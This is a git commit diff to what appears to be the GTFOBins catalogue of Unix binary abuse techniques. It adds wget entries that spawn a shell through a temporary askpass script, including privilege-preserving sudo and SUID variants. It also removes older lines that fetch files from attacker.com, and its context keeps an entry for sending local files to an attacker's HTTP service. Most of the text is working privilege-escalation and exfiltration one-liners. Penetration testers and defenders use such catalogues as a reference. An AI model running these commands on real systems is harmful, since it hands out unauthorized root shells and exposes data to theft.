Add wget shell via --use-askpass

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Emanuel Duss 2022-12-16 16:33:15 +01:00 committed by GitHub
parent e637c45b84
commit 01042c2aa1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,5 +1,11 @@
--- ---
functions: functions:
shell:
- code: |
TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
wget --use-askpass=$TF 0
file-upload: file-upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data. - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
code: | code: |
@ -25,15 +31,15 @@ functions:
LFILE=file_to_save LFILE=file_to_save
wget $URL -O $LFILE wget $URL -O $LFILE
suid: suid:
- description: Fetch a remote file via HTTP GET request. - code: |
code: | TF=$(mktemp)
URL=http://attacker.com/file_to_get chmod +x $TF
LFILE=file_to_save echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
./wget $URL -O $LFILE ./wget --use-askpass=$TF 0
sudo: sudo:
- description: Fetch a remote file via HTTP GET request. - code: |
code: | TF=$(mktemp)
URL=http://attacker.com/file_to_get chmod +x $TF
LFILE=file_to_save echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sudo wget $URL -O $LFILE sudo wget --use-askpass=$TF 0
--- ---